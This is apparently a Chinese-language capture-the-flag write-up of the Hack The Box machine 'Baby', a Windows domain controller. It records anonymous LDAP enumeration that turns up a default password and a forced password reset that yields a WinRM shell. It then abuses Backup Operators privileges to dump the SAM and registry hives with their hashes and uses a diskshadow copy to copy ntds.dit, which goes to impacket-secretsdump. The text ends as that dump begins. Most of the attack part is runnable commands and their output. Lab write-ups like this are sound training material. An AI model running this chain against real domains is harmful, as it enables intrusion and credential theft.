前期信息
扫描出来是纯正的域控
┌──(wackymaker㉿kali)-[~/tmp/hackthebox/baby]
└─$ .----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
Nmap? More like slowmap.🐢
[~] The config file is expected to be at "/home/wackymaker/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 10.129.234.71:53
Open 10.129.234.71:88
Open 10.129.234.71:135
Open 10.129.234.71:139
Open 10.129.234.71:389
Open 10.129.234.71:464
Open 10.129.234.71:445
Open 10.129.234.71:593
Open 10.129.234.71:636
Open 10.129.234.71:3268
Open 10.129.234.71:3269
Open 10.129.234.71:3389
Open 10.129.234.71:5985
Open 10.129.234.71:9389
基本信息
┌──(wackymaker㉿kali)-[~/tmp/hackthebox/baby]
└─$ cat start.sh
ip=10.129.234.71
domain=baby.vl
FQDN=BABYDC.baby.vl
入口
查询过了没有smb匿名和rpc匿名,在爆破用户前我需要先查看一下ldap,发现存在匿名
┌──(wackymaker㉿kali)-[~/tmp/hackthebox/baby]
└─$ nxc ldap $ip -u "" -p ""
LDAP 10.129.234.71 389 BABYDC [*] Windows Server 2022 Build 20348 (name:BABYDC) (domain:baby.vl) (signing:None) (channel binding:No TLS cert)
LDAP 10.129.234.71 389 BABYDC [+] baby.vl\:
┌──(wackymaker㉿kali)-[~/tmp/hackthebox/baby]
└─$ ldapsearch -x -H ldap://$ip -b "" -s base
# extended LDIF
#
# LDAPv3
# base <> with scope baseObject
# filter: (objectclass=*)
# requesting: ALL
#
#
dn:
domainFunctionality: 7
forestFunctionality: 7
domainControllerFunctionality: 7
rootDomainNamingContext: DC=baby,DC=vl
ldapServiceName: baby.vl:babydc$@BABY.VL
isGlobalCatalogReady: TRUE
supportedSASLMechanisms: GSSAPI
supportedSASLMechanisms: GSS-SPNEGO
supportedSASLMechanisms: EXTERNAL
supportedSASLMechanisms: DIGEST-MD5
supportedLDAPVersion: 3
supportedLDAPVersion: 2
supportedLDAPPolicies: MaxPoolThreads
supportedLDAPPolicies: MaxPercentDirSyncRequests
supportedLDAPPolicies: MaxDatagramRecv
supportedLDAPPolicies: MaxReceiveBuffer
supportedLDAPPolicies: MaxPreAuthReceiveBuffer
supportedLDAPPolicies: InitRecvTimeout
supportedLDAPPolicies: MaxConnections
supportedLDAPPolicies: MaxConnIdleTime
supportedLDAPPolicies: MaxPageSize
supportedLDAPPolicies: MaxBatchReturnMessages
supportedLDAPPolicies: MaxQueryDuration
supportedLDAPPolicies: MaxDirSyncDuration
supportedLDAPPolicies: MaxTempTableSize
supportedLDAPPolicies: MaxResultSetSize
supportedLDAPPolicies: MinResultSets
supportedLDAPPolicies: MaxResultSetsPerConn
supportedLDAPPolicies: MaxNotificationPerConn
supportedLDAPPolicies: MaxValRange
supportedLDAPPolicies: MaxValRangeTransitive
supportedLDAPPolicies: ThreadMemoryLimit
supportedLDAPPolicies: SystemMemoryLimitPercent
supportedControl: 1.2.840.113556.1.4.319
supportedControl: 1.2.840.113556.1.4.801
supportedControl: 1.2.840.113556.1.4.473
supportedControl: 1.2.840.113556.1.4.528
supportedControl: 1.2.840.113556.1.4.417
supportedControl: 1.2.840.113556.1.4.619
supportedControl: 1.2.840.113556.1.4.841
supportedControl: 1.2.840.113556.1.4.529
supportedControl: 1.2.840.113556.1.4.805
supportedControl: 1.2.840.113556.1.4.521
supportedControl: 1.2.840.113556.1.4.970
supportedControl: 1.2.840.113556.1.4.1338
supportedControl: 1.2.840.113556.1.4.474
supportedControl: 1.2.840.113556.1.4.1339
supportedControl: 1.2.840.113556.1.4.1340
supportedControl: 1.2.840.113556.1.4.1413
supportedControl: 2.16.840.1.113730.3.4.9
supportedControl: 2.16.840.1.113730.3.4.10
supportedControl: 1.2.840.113556.1.4.1504
supportedControl: 1.2.840.113556.1.4.1852
supportedControl: 1.2.840.113556.1.4.802
supportedControl: 1.2.840.113556.1.4.1907
supportedControl: 1.2.840.113556.1.4.1948
supportedControl: 1.2.840.113556.1.4.1974
supportedControl: 1.2.840.113556.1.4.1341
supportedControl: 1.2.840.113556.1.4.2026
supportedControl: 1.2.840.113556.1.4.2064
supportedControl: 1.2.840.113556.1.4.2065
supportedControl: 1.2.840.113556.1.4.2066
supportedControl: 1.2.840.113556.1.4.2090
supportedControl: 1.2.840.113556.1.4.2205
supportedControl: 1.2.840.113556.1.4.2204
supportedControl: 1.2.840.113556.1.4.2206
supportedControl: 1.2.840.113556.1.4.2211
supportedControl: 1.2.840.113556.1.4.2239
supportedControl: 1.2.840.113556.1.4.2255
supportedControl: 1.2.840.113556.1.4.2256
supportedControl: 1.2.840.113556.1.4.2309
supportedControl: 1.2.840.113556.1.4.2330
supportedControl: 1.2.840.113556.1.4.2354
supportedCapabilities: 1.2.840.113556.1.4.800
supportedCapabilities: 1.2.840.113556.1.4.1670
supportedCapabilities: 1.2.840.113556.1.4.1791
supportedCapabilities: 1.2.840.113556.1.4.1935
supportedCapabilities: 1.2.840.113556.1.4.2080
supportedCapabilities: 1.2.840.113556.1.4.2237
subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=baby,DC=vl
serverName: CN=BABYDC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Config
uration,DC=baby,DC=vl
schemaNamingContext: CN=Schema,CN=Configuration,DC=baby,DC=vl
namingContexts: DC=baby,DC=vl
namingContexts: CN=Configuration,DC=baby,DC=vl
namingContexts: CN=Schema,CN=Configuration,DC=baby,DC=vl
namingContexts: DC=DomainDnsZones,DC=baby,DC=vl
namingContexts: DC=ForestDnsZones,DC=baby,DC=vl
isSynchronized: TRUE
highestCommittedUSN: 118878
dsServiceName: CN=NTDS Settings,CN=BABYDC,CN=Servers,CN=Default-First-Site-Nam
e,CN=Sites,CN=Configuration,DC=baby,DC=vl
dnsHostName: BabyDC.baby.vl
defaultNamingContext: DC=baby,DC=vl
currentTime: 20250919021248.0Z
configurationNamingContext: CN=Configuration,DC=baby,DC=vl
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1
利用nxc获得了一个用户的提示
┌──(wackymaker㉿kali)-[~/tmp/hackthebox/baby]
└─$ nxc ldap $ip -u "" -p "" --users
LDAP 10.129.234.71 389 BABYDC [*] Windows Server 2022 Build 20348 (name:BABYDC) (domain:baby.vl) (signing:None) (channel binding:No TLS cert)
LDAP 10.129.234.71 389 BABYDC [+] baby.vl\:
LDAP 10.129.234.71 389 BABYDC [*] Enumerated 9 domain users: baby.vl
LDAP 10.129.234.71 389 BABYDC -Username- -Last PW Set- -BadPW- -Description-
LDAP 10.129.234.71 389 BABYDC Guest <never> 0 Built-in account for guest access to the computer/domain
LDAP 10.129.234.71 389 BABYDC Jacqueline.Barnett 2021-11-21 10:11:03 0
LDAP 10.129.234.71 389 BABYDC Ashley.Webb 2021-11-21 10:11:03 0
LDAP 10.129.234.71 389 BABYDC Hugh.George 2021-11-21 10:11:03 0
LDAP 10.129.234.71 389 BABYDC Leonard.Dyer 2021-11-21 10:11:03 0
LDAP 10.129.234.71 389 BABYDC Connor.Wilkinson 2021-11-21 10:11:08 0
LDAP 10.129.234.71 389 BABYDC Joseph.Hughes 2021-11-21 10:11:08 0
LDAP 10.129.234.71 389 BABYDC Kerry.Wilson 2021-11-21 10:11:08 0
LDAP 10.129.234.71 389 BABYDC Teresa.Bell 2021-11-21 10:14:37 0 Set initial password to BabyStart123!
但是这个密码既不是这个用户的密码,也没有爆破出来凭证复用,我觉得肯定有用,所以开始枚举漏掉的用户,先查询域内所有信息
┌──(wackymaker㉿kali)-[~/tmp/hackthebox/baby]
└─$ ldapsearch -H ldap://$ip -x -b "DC=baby,DC=vl" > ldap-anonymous
┌──(wackymaker㉿kali)-[~/tmp/hackthebox/baby]
└─$ cat ldap-anonymous | grep CN=*
dn: CN=Administrator,CN=Users,DC=baby,DC=vl
dn: CN=Guest,CN=Users,DC=baby,DC=vl
distinguishedName: CN=Guest,CN=Users,DC=baby,DC=vl
memberOf: CN=Guests,CN=Builtin,DC=baby,DC=vl
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=baby,DC=vl
dn: CN=krbtgt,CN=Users,DC=baby,DC=vl
dn: CN=Domain Computers,CN=Users,DC=baby,DC=vl
distinguishedName: CN=Domain Computers,CN=Users,DC=baby,DC=vl
objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=baby,DC=vl
dn: CN=Domain Controllers,CN=Users,DC=baby,DC=vl
dn: CN=Schema Admins,CN=Users,DC=baby,DC=vl
dn: CN=Enterprise Admins,CN=Users,DC=baby,DC=vl
dn: CN=Cert Publishers,CN=Users,DC=baby,DC=vl
distinguishedName: CN=Cert Publishers,CN=Users,DC=baby,DC=vl
memberOf: CN=Denied RODC Password Replication Group,CN=Users,DC=baby,DC=vl
objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=baby,DC=vl
dn: CN=Domain Admins,CN=Users,DC=baby,DC=vl
dn: CN=Domain Users,CN=Users,DC=baby,DC=vl
distinguishedName: CN=Domain Users,CN=Users,DC=baby,DC=vl
memberOf: CN=Users,CN=Builtin,DC=baby,DC=vl
objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=baby,DC=vl
dn: CN=Domain Guests,CN=Users,DC=baby,DC=vl
distinguishedName: CN=Domain Guests,CN=Users,DC=baby,DC=vl
memberOf: CN=Guests,CN=Builtin,DC=baby,DC=vl
objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=baby,DC=vl
dn: CN=Group Policy Creator Owners,CN=Users,DC=baby,DC=vl
member: CN=Administrator,CN=Users,DC=baby,DC=vl
distinguishedName: CN=Group Policy Creator Owners,CN=Users,DC=baby,DC=vl
memberOf: CN=Denied RODC Password Replication Group,CN=Users,DC=baby,DC=vl
objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=baby,DC=vl
dn: CN=RAS and IAS Servers,CN=Users,DC=baby,DC=vl
distinguishedName: CN=RAS and IAS Servers,CN=Users,DC=baby,DC=vl
objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=baby,DC=vl
dn: CN=Allowed RODC Password Replication Group,CN=Users,DC=baby,DC=vl
distinguishedName: CN=Allowed RODC Password Replication Group,CN=Users,DC=baby
objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=baby,DC=vl
dn: CN=Denied RODC Password Replication Group,CN=Users,DC=baby,DC=vl
member: CN=Read-only Domain Controllers,CN=Users,DC=baby,DC=vl
member: CN=Group Policy Creator Owners,CN=Users,DC=baby,DC=vl
member: CN=Domain Admins,CN=Users,DC=baby,DC=vl
member: CN=Cert Publishers,CN=Users,DC=baby,DC=vl
member: CN=Enterprise Admins,CN=Users,DC=baby,DC=vl
member: CN=Schema Admins,CN=Users,DC=baby,DC=vl
member: CN=Domain Controllers,CN=Users,DC=baby,DC=vl
member: CN=krbtgt,CN=Users,DC=baby,DC=vl
distinguishedName: CN=Denied RODC Password Replication Group,CN=Users,DC=baby,
objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=baby,DC=vl
dn: CN=Read-only Domain Controllers,CN=Users,DC=baby,DC=vl
dn: CN=Enterprise Read-only Domain Controllers,CN=Users,DC=baby,DC=vl
distinguishedName: CN=Enterprise Read-only Domain Controllers,CN=Users,DC=baby
objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=baby,DC=vl
dn: CN=Cloneable Domain Controllers,CN=Users,DC=baby,DC=vl
distinguishedName: CN=Cloneable Domain Controllers,CN=Users,DC=baby,DC=vl
objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=baby,DC=vl
dn: CN=Protected Users,CN=Users,DC=baby,DC=vl
distinguishedName: CN=Protected Users,CN=Users,DC=baby,DC=vl
objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=baby,DC=vl
dn: CN=Key Admins,CN=Users,DC=baby,DC=vl
dn: CN=Enterprise Key Admins,CN=Users,DC=baby,DC=vl
dn: CN=DnsAdmins,CN=Users,DC=baby,DC=vl
distinguishedName: CN=DnsAdmins,CN=Users,DC=baby,DC=vl
objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=baby,DC=vl
dn: CN=DnsUpdateProxy,CN=Users,DC=baby,DC=vl
distinguishedName: CN=DnsUpdateProxy,CN=Users,DC=baby,DC=vl
objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=baby,DC=vl
dn: CN=dev,CN=Users,DC=baby,DC=vl
member: CN=Ian Walker,OU=dev,DC=baby,DC=vl
member: CN=Leonard Dyer,OU=dev,DC=baby,DC=vl
member: CN=Hugh George,OU=dev,DC=baby,DC=vl
member: CN=Ashley Webb,OU=dev,DC=baby,DC=vl
member: CN=Jacqueline Barnett,OU=dev,DC=baby,DC=vl
distinguishedName: CN=dev,CN=Users,DC=baby,DC=vl
objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=baby,DC=vl
dn: CN=Jacqueline Barnett,OU=dev,DC=baby,DC=vl
distinguishedName: CN=Jacqueline Barnett,OU=dev,DC=baby,DC=vl
memberOf: CN=dev,CN=Users,DC=baby,DC=vl
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=baby,DC=vl
dn: CN=Ashley Webb,OU=dev,DC=baby,DC=vl
distinguishedName: CN=Ashley Webb,OU=dev,DC=baby,DC=vl
memberOf: CN=dev,CN=Users,DC=baby,DC=vl
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=baby,DC=vl
dn: CN=Hugh George,OU=dev,DC=baby,DC=vl
distinguishedName: CN=Hugh George,OU=dev,DC=baby,DC=vl
memberOf: CN=dev,CN=Users,DC=baby,DC=vl
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=baby,DC=vl
dn: CN=Leonard Dyer,OU=dev,DC=baby,DC=vl
distinguishedName: CN=Leonard Dyer,OU=dev,DC=baby,DC=vl
memberOf: CN=dev,CN=Users,DC=baby,DC=vl
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=baby,DC=vl
dn: CN=Ian Walker,OU=dev,DC=baby,DC=vl
dn: CN=it,CN=Users,DC=baby,DC=vl
member: CN=Caroline Robinson,OU=it,DC=baby,DC=vl
member: CN=Teresa Bell,OU=it,DC=baby,DC=vl
member: CN=Kerry Wilson,OU=it,DC=baby,DC=vl
member: CN=Joseph Hughes,OU=it,DC=baby,DC=vl
member: CN=Connor Wilkinson,OU=it,DC=baby,DC=vl
distinguishedName: CN=it,CN=Users,DC=baby,DC=vl
memberOf: CN=Remote Management Users,CN=Builtin,DC=baby,DC=vl
objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=baby,DC=vl
dn: CN=Connor Wilkinson,OU=it,DC=baby,DC=vl
distinguishedName: CN=Connor Wilkinson,OU=it,DC=baby,DC=vl
memberOf: CN=it,CN=Users,DC=baby,DC=vl
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=baby,DC=vl
dn: CN=Joseph Hughes,OU=it,DC=baby,DC=vl
distinguishedName: CN=Joseph Hughes,OU=it,DC=baby,DC=vl
memberOf: CN=it,CN=Users,DC=baby,DC=vl
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=baby,DC=vl
dn: CN=Kerry Wilson,OU=it,DC=baby,DC=vl
distinguishedName: CN=Kerry Wilson,OU=it,DC=baby,DC=vl
memberOf: CN=it,CN=Users,DC=baby,DC=vl
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=baby,DC=vl
dn: CN=Teresa Bell,OU=it,DC=baby,DC=vl
distinguishedName: CN=Teresa Bell,OU=it,DC=baby,DC=vl
memberOf: CN=it,CN=Users,DC=baby,DC=vl
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=baby,DC=vl
dn: CN=Caroline Robinson,OU=it,DC=baby,DC=vl
ref: ldap://baby.vl/CN=Configuration,DC=baby,DC=vl
将dn筛选出来,我们能获得这些用户
Administrator
Guest
krbtgt
Connor.Wilkinson
Joseph.Hughes
Kerry.Wilson
Teresa.Bell
Caroline.Robinson
Jacqueline.Barnett
Ashley.Webb
Hugh.George
Leonard.Dyer
Ian.Walker
这里我漏了一张图,打完回来找已经翻不到了,简单来说就是nxc看到了需要更改密码,Caroline.Robinson的密码就是我们之前找到的那个
┌──(wackymaker㉿kali)-[~/tmp/hackthebox/baby]
└─$ smbpasswd -U Caroline.Robinson -r $ip
Old SMB password:
New SMB password:
Retype new SMB password:
Password changed for user Caroline.Robinson
改密码后我们就能登陆了,也有winrm权限
┌──(wackymaker㉿kali)-[~/tmp/hackthebox/baby]
└─$ nxc smb $ip -u $user2 -p 'SunnyDay2025!'
SMB 10.129.42.166 445 BABYDC [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domin:baby.vl) (signing:True) (SMBv1:False) (Null Auth:True)
SMB 10.129.42.166 445 BABYDC [+] baby.vl\Caroline.Robinson:SunnyDay2025!
┌──(wackymaker㉿kali)-[~/tmp/hackthebox/baby]
└─$ nxc winrm $ip -u $user2 -p 'SunnyDay2025!'
WINRM 10.129.42.166 5985 BABYDC [*] Windows Server 2022 Build 20348 (name:BABYDC) (domain:baby.vl)
WINRM 10.129.42.166 5985 BABYDC [+] baby.vl\Caroline.Robinson:SunnyDay2025! (Pwn3d!)
提权
┌──(wackymaker㉿kali)-[~/tmp/hackthebox/baby]
└─$ evil-winrm -i $ip -u $user2 -p 'SunnyDay2025!'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Caroline.Robinson\Documents> whoami /all
USER INFORMATION
----------------
User Name SID
====================== ==============================================
baby\caroline.robinson S-1-5-21-1407081343-4001094062-1444647654-1115
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============================================== ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Backup Operators Alias S-1-5-32-551 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
BABY\it Group S-1-5-21-1407081343-4001094062-1444647654-1109 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
*Evil-WinRM* PS C:\Users\Caroline.Robinson\Documents>
打备份管理员,我本来想nxc直接远程抓算了
┌──(wackymaker㉿kali)-[~/tmp/hackthebox/baby]
└─$ nxc smb $ip -u $user2 -p ^[[200~ -p 'SunnyDay2025!' -M backup_operator
/home/wackymaker/.local/share/pipx/venvs/netexec/lib/python3.13/site-packages/masky/lib/smb.py:6: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
from pkg_resources import resource_filename
SMB 10.129.42.166 445 BABYDC [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domin:baby.vl) (signing:True) (SMBv1:False) (Null Auth:True)
SMB 10.129.42.166 445 BABYDC [+] baby.vl\Caroline.Robinson:SunnyDay2025!
BACKUP_O... 10.129.42.166 445 BABYDC [*] Triggering RemoteRegistry to start through named pipe...
BACKUP_O... 10.129.42.166 445 BABYDC Saved HKLM\SAM to \\10.129.42.166\SYSVOL\SAM
BACKUP_O... 10.129.42.166 445 BABYDC Saved HKLM\SYSTEM to \\10.129.42.166\SYSVOL\SYSTEM
BACKUP_O... 10.129.42.166 445 BABYDC Saved HKLM\SECURITY to \\10.129.42.166\SYSVOL\SECURITY
SMB 10.129.42.166 445 BABYDC [*] Copying "SAM" to "/home/wackymaker/.nxc/logs/BABYDC_10.129.42.166_2025-09-18_230638.SAM"
SMB 10.129.42.166 445 BABYDC [+] File "SAM" was downloaded to "/home/wackymaker/.nxc/logs/BABYDC_10.129.42.166_2025-09-18_230638.SAM"
SMB 10.129.42.166 445 BABYDC [*] Copying "SECURITY" to "/home/wackymaker/.nxc/logs/BABYDC_10.129.42.166_2025-09-18_230638.SECURITY"
SMB 10.129.42.166 445 BABYDC [+] File "SECURITY" was downloaded to "/home/wackymaker/.nxc/logs/BABYDC_10.129.42.166_2025-09-18_230638.SECURITY"
SMB 10.129.42.166 445 BABYDC [*] Copying "SYSTEM" to "/home/wackymaker/.nxc/logs/BABYDC_10.129.42.166_2025-09-18_230638.SYSTEM"
SMB 10.129.42.166 445 BABYDC [+] File "SYSTEM" was downloaded to "/home/wackymaker/.nxc/logs/BABYDC_10.129.42.166_2025-09-18_230638.SYSTEM"
BACKUP_O... 10.129.42.166 445 BABYDC Administrator:500:aad3b435b51404eeaad3b435b51404ee:8d992faed38128ae85e95fa35868bb43:::
BACKUP_O... 10.129.42.166 445 BABYDC Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
BACKUP_O... 10.129.42.166 445 BABYDC DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
BACKUP_O... 10.129.42.166 445 BABYDC $MACHINE.ACC:plain_password_hex:0d43eb797b84b0b440fbcb0d89fea14f8458970482b891850f2d2106c7c08447f2aa725adc71c58241311e5cebf5b75d43f5b541a43d583665ea4669bee9d1910c4ee1f4703104fccf44eb3ac2b3bb31ed1712e4fca7e416d3bd561993cd88a9750b0a04466909e51660a3fec061e9f5a51e8e10fe8c2653cd610140611ea9cd2fc1f436829369373bfb51fc5214666a9073e7a8124f4a07414ee0a7e565f24745f2ec5f134e7b7dca577813e5e82867ea33b16a1797c51703731eb1e4273db597063d62cb7f1c1a0faae15ab06aadea286b87cf6f2d28127fb948113c6b57c92a97c1aad038f958404b27f6e6d6fba5
BACKUP_O... 10.129.42.166 445 BABYDC $MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:3d538eabff6633b62dbaa5fb5ade3b4d
BACKUP_O... 10.129.42.166 445 BABYDC dpapi_machinekey:0xe620195f1a5e2d71842bbad9877d7c3ca8a31eda
dpapi_userkey:0x026920834cd39c2e8ba9401c44a8869fe6be0555
BACKUP_O... 10.129.42.166 445 BABYDC NL$KM:b696c77e178a0cdd8c39c20aa2912444a2e44dc2095946c07f95ea11cb7fcb72ec2e5a06011b26fe6da7880fa5e71fa596cde53fa0065ec1a501a1ce8c247695
SMB 10.129.42.166 445 BABYDC [-] baby.vl\Administrator:8d992faed38128ae85e95fa35868bb43 SessionError
BACKUP_O... 10.129.42.166 445 BABYDC [*] Use the domain admin account to clean the file on the remote host
BACKUP_O... 10.129.42.166 445 BABYDC [*] netexec smb dc_ip -u user -p pass -x "del C:\Windows\sysvol\sysvol\SECURITY && del C:\Windows\sysvol\sysvol\SAM && del C:\Windows\sysvol\sysvol\SYSTEM"
但是sam抓出来的本地管理员不是域管理员登陆不上,psexec也没法本地管理员登陆。估计是禁用了
┌──(wackymaker㉿kali)-[~/tmp/hackthebox/baby]
└─$ evil-winrm -i 10.129.64.108 -u 'administrator' -H '8d992faed38128ae85e95fa35868bb43'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError
Error: Exiting with code 1
只能打卷影复制器
*Evil-WinRM* PS C:\Users\Caroline.Robinson\AppData\Local\Temp> echo "set context persistent nowriters" | out-file ./diskshadow.txt -encoding ascii
*Evil-WinRM* PS C:\Users\Caroline.Robinson\AppData\Local\Temp> echo "add volume c: alias temp" | out-file ./diskshadow.txt -encoding ascii -append
*Evil-WinRM* PS C:\Users\Caroline.Robinson\AppData\Local\Temp> echo "create" | out-file ./diskshadow.txt -encoding ascii -append
*Evil-WinRM* PS C:\Users\Caroline.Robinson\AppData\Local\Temp> echo "expose %temp% z:" | out-file ./diskshadow.txt -encoding ascii -append
*Evil-WinRM* PS C:\Users\Caroline.Robinson\AppData\Local\Temp> diskshadow.exe /s C:\Users\Caroline.Robinson\AppData\Local\Temp\diskshadow.txt
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer: BABYDC, 9/19/2025 3:28:54 AM
-> set context persistent nowriters
-> add volume c: alias temp
-> create
Alias temp for shadow ID {a423bade-6a97-4a48-882e-1ca7312f498f} set as environment variable.
Alias VSS_SHADOW_SET for shadow set ID {7a62d230-0941-4238-8904-5fed8646ecab} set as environment variable.
Querying all shadow copies with the shadow copy set ID {7a62d230-0941-4238-8904-5fed8646ecab}
* Shadow copy ID = {a423bade-6a97-4a48-882e-1ca7312f498f} %temp%
- Shadow copy set: {7a62d230-0941-4238-8904-5fed8646ecab} %VSS_SHADOW_SET%
- Original count of shadow copies = 1
- Original volume name: \\?\Volume{711fc68a-0000-0000-0000-100000000000}\ [C:\]
- Creation time: 9/19/2025 3:28:54 AM
- Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
- Originating machine: BabyDC.baby.vl
- Service machine: BabyDC.baby.vl
- Not exposed
- Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
- Attributes: No_Auto_Release Persistent No_Writers Differential
Number of shadow copies listed: 1
-> expose %temp% z:
-> %temp% = {a423bade-6a97-4a48-882e-1ca7312f498f}
The shadow copy was successfully exposed as z:\.
->
*Evil-WinRM* PS C:\Users\Caroline.Robinson\AppData\Local\Temp> robocopy /B Z:\Windows\NTDS . ntds.dit
-------------------------------------------------------------------------------
ROBOCOPY :: Robust File Copy for Windows
-------------------------------------------------------------------------------
Started : Friday, September 19, 2025 3:29:44 AM
Source : Z:\Windows\NTDS\
Dest : C:\Users\Caroline.Robinson\AppData\Local\Temp\
Files : ntds.dit
Options : /DCOPY:DA /COPY:DAT /B /R:1000000 /W:30
------------------------------------------------------------------------------
1 Z:\Windows\NTDS\
New File 16.0 m ntds.dit
0.0%
0.3%
0.7%
1.1%
...........
99.2%
99.6%
100%
100%
------------------------------------------------------------------------------
Total Copied Skipped Mismatch FAILED Extras
Dirs : 1 0 1 0 0 0
Files : 1 1 0 0 0 0
Bytes : 16.00 m 16.00 m 0 0 0 0
Times : 0:00:00 0:00:00 0:00:00 0:00:00
Speed : 153,919,412 Bytes/sec.
Speed : 8,807.340 MegaBytes/min.
Ended : Friday, September 19, 2025 3:29:44 AM
*Evil-WinRM* PS C:\Users\Caroline.Robinson\AppData\Local\Temp> reg save hklm\system C:\SYSTEM
The operation completed successfully.
*Evil-WinRM* PS C:\Users\Caroline.Robinson\AppData\Local\Temp> dir
Directory: C:\Users\Caroline.Robinson\AppData\Local\Temp
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 9/19/2025 3:28 AM 610 2025-09-19_3-28-54_BABYDC.cab
-a---- 9/19/2025 3:24 AM 510 Dis2C4D.tmp
-a---- 9/19/2025 3:26 AM 1356 Dis3D2C.tmp
-a---- 9/19/2025 3:28 AM 2294 Dis6A0E.tmp
-a---- 9/19/2025 3:28 AM 86 diskshadow.txt
-a---- 9/19/2025 3:28 AM 1176 Manifest.xml
-a---- 9/19/2025 3:16 AM 16777216 ntds.dit
*Evil-WinRM* PS C:\Users\Caroline.Robinson\AppData\Local\Temp> download ntds.dit
Info: Downloading C:\Users\Caroline.Robinson\AppData\Local\Temp\ntds.dit to ntds.dit
Info: Download successful!
*Evil-WinRM* PS C:\Users\Caroline.Robinson\AppData\Local\Temp> download system
Info: Downloading C:\Users\Caroline.Robinson\AppData\Local\Temp\system to system
Error: Download failed. Check filenames or paths
*Evil-WinRM* PS C:\Users\Caroline.Robinson\AppData\Local\Temp> download c:/system
Info: Downloading c:/system to system
Info: Download successful!
*Evil-WinRM* PS C:\Users\Caroline.Robinson\AppData\Local\Temp>
┌──(wackymaker㉿kali)-[~/tmp/hackthebox/baby]
└─$ impacket-secretsdump -system system -ntds ntds.dit LOCAL
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0x191d5d3fd5b0b51888453de8541d7e88
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
